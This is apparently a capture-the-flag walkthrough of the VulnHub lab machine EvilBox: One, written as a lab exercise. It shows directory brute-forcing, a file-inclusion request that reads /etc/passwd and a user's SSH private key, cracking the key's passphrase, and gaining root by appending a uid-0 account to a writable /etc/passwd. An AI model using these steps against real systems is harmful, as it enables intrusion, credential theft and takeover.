Vulnhub: EVILBOX: ONE
This is EVILBOX: ONE from VulnHub.
I’ve been busy, super tired and yeah whatever let’s make excuses. Nah. This box is easy rated and it is genuinely easy.
Ports
HTTP and SSH.
HTTP
Quick bit of feroxbusting:
┌──(root💀kali)-[/opt/vulnhub/evilbox]
└─# feroxbuster -u http://192.168.1.92 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 200 -C 403 -x txt,php,log,bak
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.1.92
🚀 Threads │ 200
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
💢 Status Code Filters │ [403]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💲 Extensions │ [txt, php, log, bak]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200 368l 933w 10701c http://192.168.1.92/index.html
200 1l 2w 12c http://192.168.1.92/robots.txt
301 9l 28w 313c http://192.168.1.92/secret
200 0l 0w 0c http://192.168.1.92/secret/evil.php
200 4l 0w 4c http://192.168.1.92/secret/index.html
[####################] - 14s 187440/187440 0s found:5 errors:0
[####################] - 8s 23430/23430 2786/s http://192.168.1.92
[####################] - 12s 23430/23430 1855/s http://192.168.1.92/secretWhat does evil.php give us?
HTTP/1.1 200 OK
Date: Fri, 27 Aug 2021 11:06:32 GMT
Server: Apache/2.4.38 (Debian)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8Not much. Let’s get fuzzing. I use Burp Turbo Intruder:
GET /secret/evil.php?%s=/etc/passwd HTTP/1.1
We find:
http://192.168.1.92/secret/evil.php?command=/etc/passwd
Works. We have a user, mowree. Let’s look….
GET /secret/evil.php?command=/home/mowree/.ssh/id_rsa HTTP/1.1
Yep. It’s encrypted. Copy and break:
┌──(root💀kali)-[/opt/vulnhub/evilbox]
└─# /usr/share/john/ssh2john.py id_rsa > id.john
┌──(root💀kali)-[/opt/vulnhub/evilbox]
└─# john id.john -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn (id_rsa)We can SSH in.
Root
Check sudo -l; nope. Nothing in /etc/crontab, nothing else on the web. No other uses. Run linpeas - writeable /etc/passwd.
mowree@EvilBoxOne:/dev/shm$ echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
mowree@EvilBoxOne:/dev/shm$ su root2
Contraseña:
root@EvilBoxOne:/dev/shm# cd /root
root@EvilBoxOne:~# id;hostname;date
uid=0(root) gid=0(root) grupos=0(root)
EvilBoxOne
vie ago 27 13:13:29 CEST 2021
root@EvilBoxOne:~# ls -lash
total 24K
4,0K drwx------ 3 root 4,0K ago 16 13:06 .
4,0K drwxr-xr-x 18 root 4,0K ago 16 11:16 ..
0 lrwxrwxrwx 1 root 9 ago 16 13:06 .bash_history -> /dev/null
4,0K -rw-r--r-- 1 root 3,5K ago 16 11:20 .bashrc
4,0K drwxr-xr-x 3 root 4,0K ago 16 11:40 .local
4,0K -rw-r--r-- 1 root 148 ago 17 2015 .profile
4,0K -r-------- 1 root 31 ago 16 12:57 root.txt
root@EvilBoxOne:~# cat root.txt
36QtXfdJWvdC0VavlPIApUbDlqTsBM
root@EvilBoxOne:~#